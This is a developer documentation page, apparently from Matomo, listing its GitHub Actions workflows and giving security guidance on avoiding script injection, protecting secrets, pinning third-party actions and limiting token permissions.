All the GitHub Action build files are located in
Each script is triggered by its own conditions, for more details see GitHub Action Docs
Matomo uses GitHub Action to automate some processes. Our current actions a listed below:
build jsinto the pull request. That will compress js/piwik.js into matomo.js and piwik.js and push the changes if PRs branch is within the same repo.
composer updateand creates a PR for available updates
To create a new GitHub Action script please read Quickstart for GitHub Actions.
We recommend forking the Matomo project and running actions on your own pipeline first. Also, please check the following list before getting started:
There is a chance the action scripts are getting hacked, so paying attention to security is of the utmost importance when you create a new GitHub Action script.
It could lead to a GitHub token loss and write access to our code. More details
There are two common attacks - script injection attacks and Security hardening.
For more details, refer to this article
Please make sure the environment variables used in the action are not customizable by the PR title etc.
Do not save secrets with values like token, password or other sensitive information in plain text, JSON, XML, YAML (or similar).
Generally the best practice is to avoid using a third party GitHub action or script when possible. For example, when the action only executes few simple scripts, then we won't need an action for this and can just do it ourselves thus reducing the security risk.
If you need to use an action from the marketplace, please ensure that it is either an official action provided by GitHub, or you did a review of the actions code. In latter case, please ensure to use a version fixed by a full length commit SHA.
We recommend using
none permissions where possible,
read permissions if needed to read the value,
write only if needed. For more details see Permission syntax and Assigning permissions to jobs